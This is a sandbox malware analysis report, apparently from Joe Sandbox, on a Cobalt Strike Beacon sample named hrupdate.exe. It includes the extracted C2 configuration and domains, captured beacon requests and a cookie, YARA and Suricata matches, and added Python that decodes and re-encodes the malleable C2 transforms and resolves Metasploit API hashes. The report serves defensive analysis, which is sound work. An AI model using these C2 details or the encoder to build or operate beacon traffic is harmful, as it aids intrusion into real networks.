

Windows Analysis Report
hrupdate.exe

Overview

General Information

Sample name: hrupdate.exe
Analysis ID: 1578569
MD5: 03b14e9338a1c9e5551f9450207f6d84
SHA1: f1a816c47637c8d4d0b52b333cba11b0d7571fcb
SHA256: 7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
Tags: CobaltStrike, exe, user-smica83

Detection

CobaltStrike
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Machine Learning detection for sample
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • hrupdate.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\hrupdate.exe" MD5: 03B14E9338A1C9E5551F9450207F6D84)
  • cleanup
Name: Cobalt Strike, CobaltStrike
Description: Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon provides the attacker with a wealth of functionality, including, but not limited to, command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS and SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit. The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
Attribution:
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.hrtraining.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
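The Malleable_C2_Instructions in the configuration above are the steps Beacon applies, in that order, to the body of every HTTPS GET response before it parses a task: strip the fake jQuery suffix and prefixes, Base64url-decode, then undo the 4-byte XOR mask. The Python below is an added example written for this page, not code from Joe Sandbox, Cobalt Strike or the sample. It compiles that instruction list into a decoder and, so the decoder can be exercised offline, also builds the server-side encoder the team server would run. The task bytes and the "/" filler standing in for the profile's prefix/suffix text are constructed for the demonstration; a response body that is not at least as long as the profile's removals is rejected rather than decoded into garbage.

```python
import base64
import os
import re

# Transform list exactly as the report's configuration extractor printed it; Beacon
# applies these steps, in this order, to each HTTP GET response body.
MALLEABLE_C2_INSTRUCTIONS = [
    "Remove 1522 bytes from the end",
    "Remove 84 bytes from the beginning",
    "Remove 3931 bytes from the beginning",
    "Base64 URL-safe decode",
    "XOR mask w/ random key",
]
_REMOVE = re.compile(r"Remove (\d+) bytes from the (beginning|end)")


def mask(data: bytes, key: bytes = b"") -> bytes:
    """Cobalt Strike 'mask': a random 4-byte key is prepended and each payload byte
    is XORed with key[i % 4]. A fixed key may be supplied for tests."""
    key = key or os.urandom(4)
    if len(key) != 4:
        raise ValueError("mask key must be exactly 4 bytes")
    return key + bytes(b ^ key[i % 4] for i, b in enumerate(data))


def unmask(data: bytes) -> bytes:
    """Inverse of mask(): the first 4 bytes of the blob are the key."""
    if len(data) < 4:
        raise ValueError("masked blob is shorter than its 4-byte key")
    key, body = data[:4], data[4:]
    return bytes(b ^ key[i % 4] for i, b in enumerate(body))


def build_decoder(instructions):
    """Compile the extractor's instruction strings into one function mapping a raw
    response body to task bytes, applying the steps in the listed order."""
    steps = []
    for instr in instructions:
        m = _REMOVE.fullmatch(instr)
        if m:
            n, where = int(m.group(1)), m.group(2)

            def strip(d, n=n, where=where):
                if len(d) < n:  # wrong profile or truncated capture: refuse, don't guess
                    raise ValueError(f"{len(d)}-byte body, profile removes {n} from the {where}")
                return d[n:] if where == "beginning" else d[:len(d) - n]

            steps.append(strip)
        elif instr == "Base64 URL-safe decode":
            # Accept bodies with or without '=' padding.
            steps.append(lambda d: base64.urlsafe_b64decode(d + b"=" * (-len(d) % 4)))
        elif instr == "XOR mask w/ random key":
            steps.append(unmask)
        else:
            raise ValueError(f"transform not handled by this example: {instr!r}")

    def decode(body: bytes) -> bytes:
        for step in steps:
            body = step(body)
        return body

    return decode


def build_encoder(instructions, filler: bytes = b"/"):
    """The team server's side of the same profile (decode steps undone in reverse),
    used here only to fabricate a response offline. `filler` stands in for the
    jQuery-lookalike prefix/suffix text: only its length matters to the decoder."""
    steps = []
    for instr in reversed(instructions):
        m = _REMOVE.fullmatch(instr)
        if m:
            pad, at_front = filler[:1] * int(m.group(1)), m.group(2) == "beginning"
            steps.append(lambda d, pad=pad, f=at_front: pad + d if f else d + pad)
        elif instr == "Base64 URL-safe decode":
            steps.append(base64.urlsafe_b64encode)
        elif instr == "XOR mask w/ random key":
            steps.append(mask)
        else:
            raise ValueError(f"transform not handled by this example: {instr!r}")

    def encode(task: bytes) -> bytes:
        for step in steps:
            task = step(task)
        return task

    return encode


# Constructed stand-in for a Beacon task; real tasks use a CS-internal binary format.
SAMPLE_TASK = b"constructed-task-bytes:" + bytes(range(256))


def roundtrip(task: bytes = SAMPLE_TASK) -> bytes:
    """Wrap `task` as the team server would, then unwrap it as Beacon would."""
    encode = build_encoder(MALLEABLE_C2_INSTRUCTIONS)
    return build_decoder(MALLEABLE_C2_INSTRUCTIONS)(encode(task))


if __name__ == "__main__":
    print("round trip ok:", roundtrip() == SAMPLE_TASK)
```

Against real traffic the input is the decrypted response body: this sample's C2 runs over TLS 1.2, so the raw PCAP alone does not yield it. The client-to-server transforms for HttpPostUri are a separate list that this extraction does not show, so the same decoder does not apply to POST bodies.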
Source | Rule | Description | Author | Strings
dump.pcap | Windows_Trojan_CobaltStrike_f0b627fc | Rule for beacon reflective loader | unknown |
  • 0x13d0d4:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
  • 0x13dd7f:$beacon_loader_x86: 25 FF FF FF 00 3D 41 41 41 00 75 3B 8B 4D B0 81 E1 FF FF FF 00 81 F9 42 42 42 00 75
dump.pcap | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown |
  • 0x16f889:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
dump.pcap | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown |
  • 0x16f8f5:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
dump.pcap | Trojan_Raw_Generic_4 | unknown | unknown |
  • 0x13da05:$s0: 83 C6 02 8B 7D FC B9 40 00 00 00 F3 A4 8B 45 18 50 6A 40 8B 4D FC 51 E8 DD F8 FF FF 83 C4 0C 8B 55 FC 52 8B 45 14 50 8B 4D 08 8B 51 04 FF D2
  • 0x13e073:$s1: 0F B7 11 81 FA 4D 5A 00 00 75 2E 8B 45 FC 8B 48 3C 89 4D F8 83 7D F8 40 72 1F 81 7D F8 00 04 00 00 73 16 8B 55 F8 03 55 FC 89 55 F8 8B 45 F8 81 38 50 45 00 00 75 02 EB 0B 8B 4D FC 83 E9 01 89 ...
Source | Rule | Description | Author | Strings
00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown |
  • 0x886:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown |
  • 0x8f2:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown |
  • 0x886:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Metasploit_c9773203 | Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. | unknown |
  • 0x8f2:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000000.00000003.3867809207.0000000000C23000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Metasploit_7bc0f998 | Identifies the API address lookup function leverage by metasploit shellcode | unknown |
  • 0x886:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
(26 memory matches in total; only the first five are listed above.)
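Two of the rules in these tables, Windows_Trojan_Metasploit_7bc0f998 and Windows_Trojan_Metasploit_c9773203, match the ROR-13 API-hash resolver from Metasploit's block_api.asm (the reference the rule metadata cites), which Cobalt Strike's stagers and loaders reuse; that is why they fire both on the PCAP and on this process's memory dumps. The Python below is an added example written for this page, not code from the report, Metasploit or the sample. It reimplements that hash so the immediates in a dumped stager can be turned back into API names, and scans a constructed 8-byte x64 fragment for the `mov r10d, imm32` (41 BA imm32) that precedes each `call rbp` in that stub. The hash definition follows block_api.asm; the list of APIs is an assumption about what a stager typically resolves, and the fragment is not bytes taken from hrupdate.exe.

```python
from typing import Dict, List, Tuple

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """32-bit rotate right, as `ror r9d, 13` in block_api.asm does."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def module_hash(module: str) -> int:
    """Hash of the module name as the stub reads it from the PEB loader list: the
    UNICODE BaseDllName buffer, upper-cased, over MaximumLength bytes, so the UTF-16
    null terminator is part of the input."""
    h = 0
    for byte in (module.upper() + "\x00").encode("utf-16-le"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


def function_hash(function: str) -> int:
    """Hash of the export name as read from the export name table (ASCII, null included)."""
    h = 0
    for byte in (function + "\x00").encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


def api_hash(module: str, function: str) -> int:
    """The 32-bit value the shellcode compares against: module hash + function hash."""
    return (module_hash(module) + function_hash(function)) & MASK32


# Assumed set of imports this kind of stager resolves. The table is computed by the
# functions above rather than copied from a reference list, so it cannot disagree
# with them.
KNOWN_APIS: List[Tuple[str, str]] = [
    ("kernel32.dll", "LoadLibraryA"), ("kernel32.dll", "VirtualAlloc"),
    ("kernel32.dll", "CreateThread"), ("kernel32.dll", "ExitProcess"),
    ("ws2_32.dll", "WSAStartup"), ("ws2_32.dll", "WSASocketA"),
    ("wininet.dll", "InternetOpenA"), ("wininet.dll", "InternetConnectA"),
    ("wininet.dll", "HttpOpenRequestA"), ("wininet.dll", "HttpSendRequestA"),
    ("wininet.dll", "InternetReadFile"), ("ntdll.dll", "RtlExitUserThread"),
]
HASH_TABLE: Dict[int, str] = {api_hash(m, f): f"{m}!{f}" for m, f in KNOWN_APIS}


def resolve_x64_api_hashes(blob: bytes) -> List[Tuple[int, int, str]]:
    """Scan an x64 blob for `mov r10d, imm32` (41 BA imm32), the instruction the
    Metasploit x64 stub uses to load the wanted hash before `call rbp`, and name
    every hash the table knows. Returns (offset, hash, name) triples."""
    hits = []
    for off in range(len(blob) - 5):
        if blob[off] == 0x41 and blob[off + 1] == 0xBA:
            h = int.from_bytes(blob[off + 2:off + 6], "little")
            hits.append((off, h, HASH_TABLE.get(h, "unknown")))
    return hits


# Constructed x64 fragment for the demo (not bytes from hrupdate.exe):
#   41 BA 4C 77 26 07   mov r10d, 0x0726774C   ; hash("kernel32.dll", "LoadLibraryA")
#   FF D5               call rbp               ; rbp -> api_call stub
SAMPLE_FRAGMENT = bytes.fromhex("41ba4c772607ffd5")

if __name__ == "__main__":
    for off, h, name in resolve_x64_api_hashes(SAMPLE_FRAGMENT):
        print(f"+0x{off:x}: 0x{h:08X} -> {name}")
```

The `module_hash` detail that trips up reimplementations is the terminator: the stub loops over `MaximumLength` bytes of the UNICODE_STRING, so hashing "KERNEL32.DLL" without the trailing two null bytes yields a different constant and nothing in the table resolves.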
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T22:47:48.218861+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49946 | TCP
2024-12-19T22:48:03.798139+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49979 | TCP
2024-12-19T22:48:15.611444+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49980 | TCP
2024-12-19T22:48:29.363989+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49981 | TCP
2024-12-19T22:48:46.486255+0100 | 2033009 | 1 | Malware Command and Control Activity Detected | 3.79.209.76 | 443 | 192.168.2.5 | 49982 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T22:45:43.281672+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 3.79.209.76 | 80 | TCP
2024-12-19T22:47:44.887661+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49938 | 3.79.209.76 | 80 | TCP


AV Detection

Source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 15000, "MaxGetSize": 2801745, "Jitter": 37, "C2Server": "www.hrtraining.ro,/rss/portallogin-gettask.html", "HttpPostUri": "/rss/portallogin-sendlogin.html", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 3931 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe", "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 309948737, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": ""}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: hrupdate.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_046A5173 CryptAcquireContextA,CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_046A5173
Source: hrupdate.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49946 version: TLS 1.2
Source: hrupdate.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb source: hrupdate.exe
Source: Binary string: C:\Users\dan\source\repos\hrtraining\Release\hrupdate.pdb%% source: hrupdate.exe
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_0469F544 _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,0_2_0469F544
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_04699839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04699839

Networking

Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49946
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49979
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49981
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49980
Source: Network traffic | Suricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 3.79.209.76:443 -> 192.168.2.5:49982
Source: Malware configuration extractor | URLs: www.hrtraining.ro
Source: global traffic | HTTP traffic detected:
  GET /trakingu/user HTTP/1.0
  Host: www.hrtraining.ro
Source: global traffic | HTTP traffic detected:
  GET /trainingcheck_v5498 HTTP/1.0
  Host: www.hrtraining.ro
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49704 -> 3.79.209.76:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49938 -> 3.79.209.76:80
Source: global traffic | HTTP traffic detected (5 identical requests):
  GET /rss/portallogin-gettask.html HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Host: www.flntp.ro
  Accept-Encoding: gzip, deflate
  Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
Source: C:\Users\user\Desktop\hrupdate.exe | Code function: 0_2_00671CA0 _invalid_parameter_noinfo_noreturn,memcpy,_invalid_parameter_noinfo_noreturn,memcpy,memchr,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,socket,inet_addr,inet_addr,gethostbyname,inet_addr,gethostbyaddr,htons,connect,closesocket,send,memset,recv,realloc,memcpy,memset,recv,strstr,strstr,memcpy,strncpy,closesocket,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00671CA0
Source: global traffic | HTTP traffic detected (5 identical requests):
  GET /rss/portallogin-gettask.html HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Host: www.flntp.ro
  Accept-Encoding: gzip, deflate
  Cookie: __cfduid=PJPkdsXI3RIuvq9_N1aBMF8sepTm8LYzvgsLS-K03YKT-xlyRIH9UrElYHiWo99W1VtzrIFD67Rk1Icyd1sN2DRfyCPVwyCpOSn8p8eXxff4E91ntMK3r4Obk_BWVoA9IlyvgW63AtgCQoUHqHKPzOCw-mYkqI9y-tsbOjEoLtk
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  GET /trakingu/user HTTP/1.0
  Host: www.hrtraining.ro
Source: global traffic | HTTP traffic detected:
  GET /trainingcheck_v5498 HTTP/1.0
  Host: www.hrtraining.ro
Source: global traffic | DNS traffic detected: DNS query: www.hrtraining.ro
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.24.0 (Ubuntu)
  Date: Thu, 19 Dec 2024 21:45:43 GMT
  Content-Type: text/html
  Content-Length: 162
  Connection: close
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
Source: hrupdate.exe | String found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498
Source: hrupdate.exe, 00000000.00000002.3897320624.00000000044FC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498b
Source: hrupdate.exe | String found in binary or memory: http://www.hrtraining.ro/trainingcheck_v5498dummyhttp://www.hrtraining.ro/trakingu/invalid
Source: hrupdate.exe | String found in binary or memory: http://www.hrtraining.ro/trakingu/
Source: hrupdate.exe, 00000000.00000002.3896775640.0000000000AFB000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.hrtraining.ro/trakingu/user
Source: hrupdate.exe, 00000000.00000002.3896775640.0000000000AFB000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.hrtraining.ro/trakingu/useruser
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hrtraining.r
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567988184.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867908182.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588982597.0000000002DC2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hrtraining.ro/
Source: hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hrtraining.ro/KSSM
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hrtraining.ro/P
Source: hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.html
Source: hrupdate.exe, 00000000.00000003.3867908182.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlN
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hrtraining.ro/rss/portallogin-gettask.htmlxL
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown | Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown | HTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49946 version: TLS 1.2

System Summary

Source: dump.pcap, type: PCAP | Matched rule: Rule for beacon reflective loader Author: unknown
Source: dump.pcap, type: PCAP | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: dump.pcap, type: PCAP | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: dump.pcap, type: PCAP | Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000003.3588908785.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000003.3567810102.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
